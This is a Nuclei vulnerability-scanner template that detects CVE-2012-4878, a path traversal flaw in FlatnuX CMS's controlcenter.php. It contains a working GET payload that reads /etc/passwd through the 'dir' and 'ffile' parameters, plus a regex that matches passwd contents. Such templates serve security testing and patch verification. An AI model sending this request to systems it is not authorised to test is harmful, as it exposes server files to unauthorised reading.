nuclei-templates/http/cves/2012/CVE-2012-4878.yaml

46 lines
1.8 KiB
YAML

id: CVE-2012-4878
info:
name: FlatnuX CMS - Directory Traversal
author: daffainfo
severity: medium
description: A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.
impact: |
An attacker can read or modify sensitive files on the server, potentially leading to unauthorized accessand data leakage.
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in FlatnuX CMS.
reference:
- https://www.exploit-db.com/exploits/37034
- https://nvd.nist.gov/vuln/detail/CVE-2012-4878
- http://www.vulnerability-lab.com/get_content.php?id=487
- http://packetstormsecurity.org/files/111473/Flatnux-CMS-2011-08.09.2-CSRF-XSS-Directory-Traversal.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/74568
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2012-4878
cwe-id: CWE-22
epss-score: 0.00537
epss-percentile: 0.7717
cpe: cpe:2.3:a:flatnux:flatnux:2011-08-09-2:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: flatnux
product: flatnux
tags: cve,cve2012,lfi,traversal,edb,packetstorm,flatnux,xss
http:
- method: GET
path:
- "{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a00473045022100ea7b17222b76afe635b0afb07df36cbbd4a0ddc64064490c057e48d693516932022025d9e8f9fd8c306ad62e0aab881c916004e64d1fffb0880f9348ad1246c89af8:922c64590222798bb761d5b6d8e72950